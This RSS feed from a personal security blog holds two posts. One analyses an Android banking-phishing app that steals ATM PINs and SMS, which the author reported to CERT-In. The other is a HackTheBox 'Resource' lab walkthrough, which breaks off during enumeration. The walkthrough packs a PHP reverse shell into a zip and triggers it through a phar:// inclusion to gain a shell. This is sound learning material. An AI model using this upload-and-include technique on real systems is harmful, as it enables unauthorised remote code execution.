index.xml

<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title/><link>https://h4r1337.github.io/</link><description>Recent content on</description><generator>Hugo -- gohugo.io</generator><language>en</language><lastBuildDate>Sat, 30 Nov 2024 00:25:56 +0530</lastBuildDate><atom:link href="https://h4r1337.github.io/index.xml" rel="self" type="application/rss+xml"/><item><title>Android Malware Targeting Banking Credentials and SMS Data | Malware Research</title><link>https://h4r1337.github.io/posts/boi_android_malware/</link><pubDate>Sat, 30 Nov 2024 00:25:56 +0530</pubDate><guid>https://h4r1337.github.io/posts/boi_android_malware/</guid><description>&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>A few weeks ago, someone shared a shady message with Android malware in the WhatsApp group of a cybersecurity community I’m part of. I’ve always wanted to do some malware analysis and Android security, and since the message or app didn’t even attempt to look legitimate, I figured it wasn’t created by someone particularly competent, I decided to take this as an opportunity to start learning. I quickly downloaded that APK file into my system, before the admin noticed and deleted it. In this blog, I’ll share my experience analyzing the malware, what I discovered, and the steps I took to begin understanding this field.&lt;/p></description><content>&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>A few weeks ago, someone shared a shady message with Android malware in the WhatsApp group of a cybersecurity community I’m part of. I’ve always wanted to do some malware analysis and Android security, and since the message or app didn’t even attempt to look legitimate, I figured it wasn’t created by someone particularly competent, I decided to take this as an opportunity to start learning. I quickly downloaded that APK file into my system, before the admin noticed and deleted it. In this blog, I’ll share my experience analyzing the malware, what I discovered, and the steps I took to begin understanding this field.&lt;/p>
&lt;p>For starters:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>$ sha256sum &lt;span style="color:#b8bb26">&amp;#39;Bank of India.apk&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>cae6d729dd038011081bba1b2eaf79262698451cddcf356175146ca272d2c132 Bank of India.apk
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="static-code-analysis">Static Code Analysis&lt;/h2>
&lt;p>For static code analysis, I am using &lt;a href="https://github.com/skylot/jadx">Jadx&lt;/a> which is an open source tool for decompiling Java code.
When doing static analysis on android apps, the first thing to check is the &lt;a href="https://developer.android.com/guide/topics/manifest/manifest-intro">&lt;code>AndroidManifest.xml&lt;/code>&lt;/a> file. This is where some of the importand informations like permissions, activities, services, etc. are stored.
These are the permissions:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108233156.webp" alt="">&lt;p>Since it is requesting permissions for read/recieve/send sms, it is possible that this might be a spyware.
The application is also using firebase:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108233728.webp" alt="">&lt;p>Malicious apps may often use firebase as a communication channel between the app and C2 servers. We have to further analyse the code to know what exactly are they using firebase forin this case.
There are 2 activities from &lt;code>com.dhoomun.jsahdio.laksdkzlkl.dhoomun.boi.app&lt;/code> which is the malicious package in the app:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108234308.webp" alt="">&lt;p>As the name suggests, the &lt;code>NoInternetActivity&lt;/code> class checks if there&amp;rsquo;s internet access and if it&amp;rsquo;s true then it just runs the &lt;code>MainActivity&lt;/code> class.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108234731.webp" alt="">&lt;p>So we will look into the &lt;code>MainActivity&lt;/code> class since it is the entry point:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108235235.webp" alt="">&lt;p>It first checks if &lt;code>SEND_SMS&lt;/code> and &lt;code>RECIEVE_SMS&lt;/code> permissions are set (&lt;em>then ofcourse, the &lt;code>NoInternetActivity&lt;/code> is triggered if there&amp;rsquo;s no internet connection&lt;/em>) and then starts a &lt;a href="https://developer.android.com/reference/android/webkit/WebView">&lt;code>WebView&lt;/code>&lt;/a> and loads a local file &lt;code>file:///android_asset/index.html&lt;/code> which is bundled with the apk file. Nothing else important is happening in this activity, so let&amp;rsquo;s look at this &lt;code>index.html&lt;/code>. In &lt;code>Jadx&lt;/code> these assets can be located inside &lt;code>Resources&lt;/code> section.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241108235911.webp" alt="">&lt;p>There&amp;rsquo;s some other files apart from the &lt;code>index.html&lt;/code> file and since it is the entrypoint we will look into it first.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109000237.webp" alt="">&lt;p>It just opens &lt;code>start.html&lt;/code>&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109000655.webp" alt="">&lt;p>There is a form with two inputs, one for name and another one for mobile number. This page also loads two local JavaScript files and there&amp;rsquo;s also some inline JavaScript as well.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109002555.webp" alt="">&lt;p>It first initializes the firebase database, then it retrieves username and phone number from the above form and passes the value into &lt;code>saveMessages&lt;/code> function. After that it redirects the user to &lt;code>pc2.html&lt;/code>.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109002834.webp" alt="">&lt;p>The &lt;code>saveMessage&lt;/code> function adds name, phone, current date, and time to the firebase database.
Similarly there&amp;rsquo;s also a form in &lt;code>pct.html&lt;/code>:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109003151.webp" alt="">&lt;p>This one asks for the last 4 digit of the user&amp;rsquo;s account number and the ATM Pin. Then just like before save that to the database with current date and time.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109004049.webp" alt="">&lt;p>After saving the data, it then redirects to &lt;code>success.html&lt;/code>. But there isn&amp;rsquo;t nothing much happening in this page, contrary to the &lt;code>// Redirect to OTP page&lt;/code> comment shown in the &lt;code>pc2.html&lt;/code> page.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109004337.webp" alt="">&lt;p>In the assets there&amp;rsquo;s two javascript files - &lt;code>script.js&lt;/code> and &lt;code>ld.js&lt;/code>.
&lt;code>ld.js&lt;/code> contains some kind of time format functions which isn&amp;rsquo;t important. The &lt;code>script.js&lt;/code> file contains the firebase configurations:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109004920.webp" alt="">&lt;p>If we check the &lt;code>authDomain&lt;/code>, it shows a site not found error:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109012621.webp" alt="">&lt;p>It seems either it is not configured properly or they deleted the project. But we can still access the firebase database by &lt;a href="https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum">accessing the &lt;code>.json&lt;/code> endpoint&lt;/a>:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109013122.webp" alt="">&lt;p>And if we scroll down a bit, we can see the data that was mentioned in the code we analysed including name, phone, account number, atm pin, date and time:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109013547.webp" alt="">&lt;p>But we haven&amp;rsquo;t yet seen the code that adds the first section of the json, the &lt;code>sms&lt;/code> section, and we haven&amp;rsquo;t seen where the &lt;code>SMS_RECIEVE&lt;/code> &amp;amp; &lt;code>SMS_SENT&lt;/code> permissions are being used. So I searched one of the values from the first bit to see the exact code in which these data are getting added to the database:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109014302.webp" alt="">&lt;p>There&amp;rsquo;s one match:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109015231.webp" alt="">&lt;p>This is where the values are being added to the firebase database. The &lt;code>sb2&lt;/code> contains the sms and it is defined in the &lt;code>SmsReceiver&lt;/code> class:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109015729.webp" alt="">&lt;p>The code intercepts all the sms received and this is what get sent to the &lt;code>Y.b&lt;/code> class and finally get added to the firebase database.&lt;/p>
&lt;h3 id="static-analysis---tldr">Static Analysis - TLDR;&lt;/h3>
&lt;p>I will try to list what we have found about the application so far using static code analysis:&lt;/p>
&lt;ul>
&lt;li>The app mainly uses permissions to read, recieve, and send sms.&lt;/li>
&lt;li>App uses &lt;code>WebView&lt;/code> to display local html files bundled with the apk assets through which it collects user inputs and saves in a database.&lt;/li>
&lt;li>The collected user inputs includes name, phone number, account number, ATM PIN, current date, and time.&lt;/li>
&lt;li>These data are stored in a firebase database for which all of the configurations including &lt;code>apikey&lt;/code> is leaked in one of the JavaScript files in the apk assets.&lt;/li>
&lt;li>The app additionally collects SMSs recieved on the phone and saves it to the database as well.&lt;/li>
&lt;li>The firebase database is misconfigured and is publicly accessible by anyone with the project id by appending &lt;code>/.json&lt;/code> to the url.
The &lt;code>WebView&lt;/code> is mainly used to run, I would say, a phishing attack by which they are getting the most critical data which is the Account Number, and ATM PIN from the user. The only information that is collected without user&amp;rsquo;s knowledge is the SMS contents (not entirely without the user&amp;rsquo;s knowlege, since the user have to accept the permission, but this comes under abuse of the permission for malicious intents).&lt;/li>
&lt;/ul>
&lt;p>And for the phishing attack to work, it has to be convincing enough right? so let&amp;rsquo;s move on to dynamic analysis.&lt;/p>
&lt;h2 id="dynamic-analysis">Dynamic Analysis&lt;/h2>
&lt;p>I am using Android studio emulator for dynamic analysis in here.
I have already created an emulator for some android development before, so I will be using that.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>emulator -list-avds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109024620.webp" alt="">&lt;p>Start the android emulator:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>emulator -avd Pixel_6_Pro_API_30
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Push the apk file to &lt;code>/sdcard/Download&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>adb push &lt;span style="color:#b8bb26">&amp;#39;Bank of India.apk&amp;#39;&lt;/span> /sdcard/Download
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now in the android emulator, open file manager and install the app, and run it.
Send and View SMS Permission:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109024908.webp" alt="">&lt;p>The &lt;code>index.html&lt;/code> page that asks for name and phone number:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109025028.webp" alt="">&lt;p>The &lt;code>pc2.html&lt;/code> account verification page, asks for Account No. and ATM PIN&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109025129.webp" alt="">&lt;p>This is, I guess, an endless loading screen:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109025153.webp" alt="">&lt;p>The spinner keeps spinning and in the meantime attacker can read if there&amp;rsquo;s any otp that is coming to this number.
I then checked the firebase database if the values I entered has been added:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241109025827.webp" alt="">&lt;p>And yes, it has been added and we can confirm that this is still working. When I finally checked the database size is around 2MB and it is keeps increasing as time goes meaning that this malware is still in the run and people are installing it and entering critical informations. Even people can identify the phishing through the &lt;code>WebView&lt;/code>, they are still prone to the SMS spying and all their SMSs are logged into the database.&lt;/p>
&lt;h2 id="reporting-to-cert-in">Reporting to Cert-in&lt;/h2>
&lt;p>&lt;a href="https://www.cert-in.org.in/">&lt;strong>CERT-In&lt;/strong>&lt;/a> (Indian Computer Emergency Response Team) is India’s national agency responsible for handling cybersecurity incidents, improving cybersecurity awareness, and coordinating responses to cyber threats. Established in 2004 under the Ministry of Electronics and Information Technology (MeitY), it monitors and defends against cyberattacks targeting India’s critical infrastructure, organizations, and individuals. CERT-In also issues advisories, conducts training, and collaborates with international cybersecurity agencies to enhance global and national cybersecurity resilience.
After seeing the severity of this incident, I decided to report it the CERT-In team. I sent a detailed report explaining the issue including the technical analysis to &lt;code>incident@cert-in.org.in&lt;/code>.
To my surprise I got the response just after an hour, and they started invistigating into the issue.&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>I am publishing this blog post after confirming that the firebase database have been taken down:
&lt;img src="https://h4r1337.github.io/img/boi_android/Pasted%20image%2020241130004121.webp" alt="">&lt;/p>
&lt;p>I haven&amp;rsquo;t uploaded the &lt;code>apk&lt;/code> into services like &lt;a href="https://www.virustotal.com/">virustotal&lt;/a> in my research. Partly because if I did, then It would have been easier for other researchers to access it publicly and retrieve all the PII data.
But the CERT-In team uploaded it to virustotal while doing their research anyway. You can access it &lt;a href="https://www.virustotal.com/gui/file/cae6d729dd038011081bba1b2eaf79262698451cddcf356175146ca272d2c132">here&lt;/a> if you want to look into it yourself.
I don&amp;rsquo;t have a lot of malware research experience, and this one was a pretty simple and straight forward one. If you&amp;rsquo;ve encountered any similar malware or have samples you&amp;rsquo;d like to share, feel free to reach out to me on &lt;a href="https://www.linkedin.com/in/h4r1337/">LinkedIn&lt;/a> or &lt;a href="https://x.com/h4r1337">Twitter&lt;/a>. I’d love to collaborate, dive deeper into the analysis, and write about it.&lt;/p></content></item><item><title>Resource | HackTheBox</title><link>https://h4r1337.github.io/posts/resource/</link><pubDate>Fri, 29 Nov 2024 23:35:37 +0530</pubDate><guid>https://h4r1337.github.io/posts/resource/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/resource/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Resource">Resource&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Hard&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/4935">&lt;img src="https://www.hackthebox.com/badge/image/4935" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Resource
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Resource is a hard difficulty Linux machine that intricately covers various ways to use &lt;code>OpenSSH&lt;/code> private and public keys. It centers around the &lt;code>SSG IT Resource Center&lt;/code> which offers a ticketing service to address the IT issues (&lt;code>SSH&lt;/code> access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over &lt;code>SSH&lt;/code> artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final &lt;code>SSH&lt;/code> key and achieving full privilege escalation.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/resource/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Resource">Resource&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Hard&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/4935">&lt;img src="https://www.hackthebox.com/badge/image/4935" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;br>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Resource
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>Resource is a hard difficulty Linux machine that intricately covers various ways to use &lt;code>OpenSSH&lt;/code> private and public keys. It centers around the &lt;code>SSG IT Resource Center&lt;/code> which offers a ticketing service to address the IT issues (&lt;code>SSH&lt;/code> access, website and security issues, etc. ) of its customers. Upon creating a ticket through the website we can execute Local File Inclusion, trigger a reverse shell and get access to what appears to be a docker container which hosts the ticketing website. From this point, there are various clues in past tickets and left over &lt;code>SSH&lt;/code> artifacts as well as a key signing API service that will lead to pivoting through other users and escaping the docker. Finally, the machine includes various scripts detailing the functions of its ticketing service and key signing API, one of which includes a vulnerable line of code allowing for brute forcing the final &lt;code>SSH&lt;/code> key and achieving full privilege escalation.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p- -vv --min-rate &lt;span style="color:#d3869b">5000&lt;/span> 10.10.11.27 -oA nmap/ports
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> itrc.ssg.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.27&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.27s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-08-08 18:56:08 IST &lt;span style="color:#fe8019">for&lt;/span> 1s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>2222/tcp open EtherNetIP-1 syn-ack
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>nmap -p22,80,2222 -vv -sC -sV --min-rate &lt;span style="color:#d3869b">5000&lt;/span> 10.10.11.27 -oA nmap/servce
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> itrc.ssg.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.27&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up, received syn-ack &lt;span style="color:#fe8019">(&lt;/span>0.26s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Scanned at 2024-08-08 18:58:41 IST &lt;span style="color:#fe8019">for&lt;/span> 15s
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE REASON VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u3 &lt;span style="color:#fe8019">(&lt;/span>protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http syn-ack nginx 1.18.0 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-cookie-flags:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| /:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| PHPSESSID:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ httponly flag not &lt;span style="color:#fabd2f">set&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-methods:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ Supported Methods: GET HEAD POST OPTIONS
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: nginx/1.18.0 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: IT Support Center
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>2222/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="enumeration">Enumeration&lt;/h1>
&lt;h2 id="port-80---http-nginx-1180">Port 80 - HTTP (Nginx &lt;code>1.18.0&lt;/code>)&lt;/h2>
&lt;p>Forwarding to &lt;code>itrc.ssg.htb&lt;/code>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240808185634.webp" alt="">
Adding that to &lt;code>/etc/hosts&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">echo&lt;/span> -e &lt;span style="color:#b8bb26">&amp;#39;10.10.11.27\titrc.ssg.htb&amp;#39;&lt;/span> | sudo tee -a /etc/hosts
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240808190008.webp" alt="">
Clicking on login redirects us to &lt;code>/?page=login&lt;/code>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240808190601.webp" alt="">
I tried LFI on the &lt;code>page&lt;/code> parameter:
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240808190744.webp" alt="">
But it redirects us back to the home page. The &lt;code>#&lt;/code> at the end of the url was to bypass potential file extensions like &lt;code>.php&lt;/code> extension that will be added to the page value. I also tried &lt;code>%0a&lt;/code>, &lt;code>%00&lt;/code>, etc. Those were also not working&lt;/p>
&lt;p>I registered an account and logged in and we can access a dashboard now.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240808191606.webp" alt="">
We can create tickets and upload files. This is often the place for XSS, so we can enter some payloads for testing.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809183239.webp" alt="">
I tried to use the upload functionality to upload a php reverse shell but that didn&amp;rsquo;t worked. It strictly checks if the upload file is a zip file.
Next thing I noticed is every ticket have an &lt;code>id&lt;/code> assigned to it, and we can view the contents of the ticket.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809183352.webp" alt="">
So I tried IDOR.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809183509.webp" alt=""> That wasn&amp;rsquo;t working either, It redirected us to the home page.&lt;br>
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809183525.webp" alt="">
Then I checked the source code and saw that the value of the &lt;code>id&lt;/code> parameter was reflecting in the js code.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809183812.webp" alt="">
We can inject js code through the &lt;code>id&lt;/code> paramter and when the &lt;code>submitComment&lt;/code> function is invoked, that is when we press the comment button our payload will execute.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809184230.webp" alt="">
But it is just a self xss, no actual impact. Then again I focused on the upload functionality.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020241129192411.webp" alt="">
The uploaded zip file is placed in the &lt;code>/uploads/&lt;/code>, the server renames the file. I checked if any of the files inside the zip file is extracted in the &lt;code>/uploads&lt;/code> folder but found nothing. If we can somehow execute a php file inside the zip archive we can achieve rce in the server. In php we can use the &lt;a href="https://www.php.net/manual/en/phar.using.stream.php">&lt;code>phar://&lt;/code> wrapper&lt;/a> to execute a php file inside the zip archive we upload. We can use the &lt;code>?page&lt;/code> parameter and give it a &lt;code>phar://&lt;/code> url and see how it responds.&lt;/p>
&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="phar-deserialization">&lt;code>phar://&lt;/code> deserialization&lt;/h2>
&lt;p>First lets create a zip file with a php reverse shell.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-sh" data-lang="sh">&lt;span style="display:flex;">&lt;span>cp /usr/share/webshells/php/php-reverse-shell.ph shell.php
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># change ip and port in shell.php&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># then create the zip file&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>zip -r poc.zip shell.php
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now upload the &lt;code>poc.zip&lt;/code> and execute the &lt;code>shell.php&lt;/code> by sending a request to:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-http" data-lang="http">&lt;span style="display:flex;">&lt;span>http://itrc.ssg.htb/?page=phar://uploads/83ffc3c94d5736acfff31d7092fed6d6dcf414cd.zip/shell
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And we got the shell
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809185821.webp" alt="">&lt;/p>
&lt;hr>
&lt;h1 id="lateral-movement-to-user">Lateral Movement to user&lt;/h1>
&lt;h2 id="local-enumeration">Local Enumeration&lt;/h2>
&lt;p>There is a &lt;code>.dockerenv&lt;/code> file in the root directory, indicating that we are inside a docker container.
&lt;img src="https://h4r1337.github.io/img/resource/Pasted%20image%2020240809191810.webp" alt="">
I checked the &lt;code>/var/www/itrc&lt;/code> directory and saw a &lt;code>db.php&lt;/code> file&lt;/p>
